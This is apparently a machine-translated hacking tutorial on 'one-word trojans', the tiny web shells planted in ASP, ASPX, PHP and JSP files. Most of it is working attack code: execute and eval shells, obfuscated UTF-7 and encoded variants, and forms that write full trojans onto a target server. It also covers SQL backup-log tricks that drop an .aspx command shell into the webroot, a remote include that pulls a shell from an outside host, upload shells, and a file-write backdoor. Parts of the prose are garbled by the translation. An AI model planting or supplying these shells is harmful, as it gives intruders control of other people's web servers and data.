The working principle of the Trojan horse

A word Trojan working principle: A Word Trojan Analysis server and client.

"One word trojan" service end (is used for local HTML submission script Trojan file)
Is the ASP statement that we are going to use to insert into the ASP file, (not only the database file with ASP as suffix), the statement will return to trigger, receive the data that the intruder submits through the client, execute and complete the corresponding operation, the service end code content is <%execute request (" Value ")%> where value can be modified by itself

"One word trojan" Client (ASP executable with a phrase inserted on the remote server)
Used to submit the control data to the server, the submitted data constitute the complete ASP function statement and execute through the server, that is, generate the ASP Trojan file we need

In a word the application of the Trojan environment:

1. The Guest account for the server has write access
2. Known database address and database format ASA or ASP
3. In the case of database format is not ASP or ASA, if you can insert a sentence into the ASP file can also

Let's assume that the <%execute request ("value")%> this statement is already in the text.asp (client) of the remote host. In the ASP <%execute .......%> meaning is the execution of the statement in the ellipsis. So if I write in our carefully constructed statement, it will also help us execute it. In this way, we can construct a form locally that reads as follows: (// As a note)

<form action=http://host path/text.asp method=post>    <textarea name=value  cols=120 rows=10 width=45>    Set lp=server.createobject ("Adodb.Stream")/Create Stream objects     lp.open //Open   lp.type=2 //text   lp.charset= "gb2312"  //font standard   Lp.writetext request ("NewValue")     Lp.savetofile server.mappath ("newmm.asp"), 2 // To write the Trojan content in the way of overwriting the file newmm.asp,2 is the way of covering   covering     lp.close //closing object   set lp=nothing //releasing object   response.redirect  "newmm.asp"  //turn newmm.asp     </textarea>    < textarea name=newvalue cols=120 rows=10 width=45> Add to Trojan content </textarea><BR> <center><br>  <input type=submit value= submission >    </form>   

The function of the form is to submit the contents of our form to the text.asp of the remote host. And then because the text.asp has <%execute request ("value")%> this sentence, then this code will carry out what we came from the form of the content Oh. (table Single-name must be the same as the value in <%execute request ("value")%>, which is the two places that I mark with blue, which must be equal)

Speaking of which, everyone is clear. We constructed two forms, the first form of code is the code for file operations (that is, the contents of the second form are written to the current directory and named NewValue.) ASP's handling of such a section of the code) then the second form of course is the horse we want to write.

The following is the specific paragraph:

Set Lp=server.createobject ("ADODB.stream")//Create Stream object Lp.open//Open lp.type=2//text lp.charset= "gb2312"//font standard LP.WR Itetext request ("NewValue") lp.savetofile Server.MapPath ("newvalue.asp"), 2//write the Trojan content in the way of overwriting the file newmm.asp,2 is the way that is covered LP . Close//Off Object Set lp=nothing//Release object Response.Redirect "newmm.asp"//Turn newmm.asp

In this case the name of the second form must be the same as the newvalue in the Lp.writetext request ("NewValue"), which is the two places I marked in red.
At this point, as long as the server has write permission, the contents of the horse submitted by your form will be written to the newmm.asp. That is, newmm.asp is our shell address.

about server errors:

Often, a type mismatch error occurs when we add a sentence to an ASP file:

Script error detected at line 1. Source Line:execute Request ("Nettoo") Description: Type mismatch: ' Execute '

How does this work out?
Come up with a good idea, as long as the "eval" to replace the "execute" server, there will be no error!
With a Word client connection, add fault tolerant statement, you can insert it into any ASP file without error as before.
<%on Error Resume Next Execute request ("value")%>

Common ASP One word Trojan Variant:

<%set ms = Server. CreateObject ("MSSCRIPTCONTROL.SCRIPTCONTROL.1") Ms. Language= "VBScript" Ms. AddObject "Response", Response Ms. AddObject "Request", request Ms. AddObject "Session", session Ms. AddObject "Server", Server Ms. AddObject "Application", application Ms. Executestatement ("Ex" & "Ecute (Request CHR)")%>

<%executeglobal request (CHR)%>

<%executeglobal request (CHR)%>

<%execute request ("#")%>

<%execute request (CHR)%>

<script language=vbscript runat=server>if Request (CHR) <> "" "Then
Executeglobal Request (Chr (35))
</script>

<%executeglobal request (CHR)%> September 30

<%eval request ("#")%>

Insert in Database
┼ 攠 number 畣 爠 Huan enemy 瑳 ∨∣┩ 忾

Utf-7 's horse.
<%@ codepage=65000%>
<% Response. charset= "936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+aci-#+aci) +j-) +j-%>

<%set ms = Server. CreateObject ("MSSCRIPTCONTROL.SCRIPTCONTROL.1")
Ms. Language= "VBScript"
Ms. AddObject "Response", Response
Ms. AddObject "Request", request
Ms. AddObject "Session" and session
Ms. AddObject "Server", server
Ms. AddObject "Application", application
Ms. Executestatement ("Ex" & "Ecute (Request CHR)")%>

<%@ LANGUAGE = Vbscript.encode%>
<%#@~^pgaaaa==r6p. ;! +/d ' 14dv&x#*@!@*erppd4+ p2xn^ed+vvg4cs,dn;! n/d ' ^4m ' &Xb*oBMAAA==^#~@%>

a kind of environment under the word Trojan:

aspx

1. Equivalent to ASP's a word Trojan:

Program code

ALTER DATABASE pubs set RECOVERY full--
CREATE TABLE Pubs.dbo.cmd (a image)
BACKUP LOG pubs to disk = & #39;c:/tm& #39; With Init
INSERT into Pubs.dbo.cmd (a) VALUES (& #39 <%@ Page language= "C #" validaterequest= "false"%><% System.IO.StreamWriter ow=new System.IO.StreamWriter (Server.MapPath ("Images.aspx"), false); Ow.write ( Request.params["L"]) Ow.close ()%> & #39;)
BACKUP LOG pubs to disk = & #39;d:/test11.aspx& #39;
This is the same as the ASP, the client post a variable l throw the Trojan code in the variable L inside OK this is similar to ASP's a word Trojan.
Mu.aspx.htm Client: (Post-submit access: http://IP/images.aspx)

<form action=http://192.168.2.100/asp/mu.aspx method=post>    <b> Enter Malaysia content below: </ b><br>  <textarea name=l cols=120 rows=35 width=45>    <%@  page language= "VB"  debug= "true"  %>  <%@ import namespace= "system. IO " %>  <%@ import namespace=" System.Diagnostics " %>  <script  runat= "Server" >    sub runcmd (Src as object, e as eventargs)     Dim myprocess as new process ()     dim myprocessstartinfo as  New processstartinfo (XPath. Text)     myprocessstartinfo.useshellexecute = false    myprocessstartinfo.redirectstandardoutput = true    myprocess.startinfo =  myprocessstartinfo    Myprocessstartinfo.arguments=xcmd.text   Myprocess.start ()   Dim  MyStreamreader as streamreader = myprocess.standardoutput    Dim myString As  string = mystreamreader.readtoend ()   myprocess.close ()   Mystring=replace (mystring, " < ", <")   Mystring=replace (mystring, ">", ">")   result.text= vbcrlf &  " <pre> " & mystring & " </pre> "  end sub    </script >

2, below this is I look for the online asp.net upload file program, the modification is streamlined, also may use:

Program code

drop table Pubs.dbo.cmd
ALTER DATABASE pubs set RECOVERY full
CREATE TABLE Pubs.dbo.cmd (a image)
BACKUP LOG pubs to disk = & #39;c:/tm& #39; With Init
INSERT into Pubs.dbo.cmd (a) VALUES (& #39 <script language= "C #" runat= "server" >private void BC (Object o, EventArgs e) {string u= "files"; string Filename;int pos=f.postedfile.filename.lastindexof ("//"); filename=f. PostedFile.FileName.Substring (pos + 1); F.postedfile.saveas (Server.MapPath (U) + "//" +filename);} </script><form method= "POST" runat= "server" ><input type= "file" id= "F" runat= "Server"/><input Type= "Submit" value= "ss" runat= "Server"/></form>& #39;)
BACKUP LOG pubs to disk = & #39;c:/inetpub/wwwroot/test11.aspx& #39;

Php

There is nothing special about this article, just to find a point. and gave me the same dish of friends wandering around the PHP door.
Just learn PHP not a few days, I am eager to work, so there are errors and deficiencies please actively point out.
PHP syntax is powerful is the ASP, only one: Phpinfo ();? > can spy on the configuration of the entire server. Run cmd, upload files, etc., are very simple, now use a good php Trojan horse, no more than Angel Phpspy. Yesterday Hak_ban asked how to encrypt the PHP trojan, I have not thought, but for writing a miniature PHP trojan, I think it is difficult to be killed.
Here are a few functions that can be used as Trojans:

1. Several functions that can run external commands: System,passthru,exec,shell_exec,popen.
Example: As long as the <?system ($cmd); > Save as cmd.php and can realize the function of running external commands. These functions can be said to be the first Wicheng PHP Trojan, so the general virtual host settings will also block these functions.

2. Remember the WDB forum style.php loophole? We can use this to make a small trojan that is difficult to be killed. As follows:

<?php include ($include);? >

Save it to 1.php, we can call other PHP servers that do not support. PHP Trojan Horse (such as phpspy.php) to achieve our goal: http://target.com/1.php? include=http://www.xxx.com/phpspy.php
Here http://www.918x.com does not support PHP, otherwise it will run phpspy.php on the http://www.xxx.com server instead of the target server.

3. This is still angel in Discuz 2.2F attack to give us a very good upload trojan, I did not change:

<?copy ($_files[myfile][tmp_name],$_files[myfile][name]);? >

After you save it as a up.php, submit the form locally:

<form enctype= "Multipart/form-data" action= "http://target server/up.php" method= "POST" > <input name= "MyFile" File "> <input value=" submitted "type=" Submit "> </form>

You can upload a large php trojan.

4. I have been wondering if there is an ASP with the ice Fox prodigal son of a Trojan horse like the one submitted by local form to run PHP. Finally found the function: eval, its syntax description in the PHP4 Chinese reference manual:
Syntax: void eval (string code_str);
Description: This function can be used to take the value of the variable in the string, usually in the processing of data on the database. Parameter code_str is the string to be processed. The value of the note is that the string to be processed conforms to the PHP string format, with a semicolon at the end. The string that is processed using this function will be followed by the end of the PHP program.

We can save on the target host: <?eval ($cmd);? > is a php file (I think it can be inserted in any file in PHP). It then achieves the goal by submitting locally, but unlike the ASP, when MAGIC_QUOTES_GPC = On, many characters are filtered, making the usage function much smaller.

I have done many times for this PHP trojan sheet and have no mature code yet. Also please master advice. When you write it, you will give it to everyone. But the Eval function can do a miniature PHP Trojan is no doubt.
Ps: After writing, someone told me, in fact, the master has a miniature of the PHP Trojan, but not public. Hey, I am so depressed ah, the study are people have already had the results. Anyway, share my research with you, I hope to get help and advice.

Jsp

<% if (Request.getparameter ("F")!=null) (New Java.io.FileOutputStream (Application.getrealpath ("//") +   Request.getparameter ("F")). Write (Request.getparameter ("T"). GetBytes ()); %>

I don't think I need to tell you this back door. or a hint. Save as 1.jsp submit url!

Http://localhost/1.jsp?f=1.txt&t=hello

Then: Http://localhost/1.txt out the content for hello ....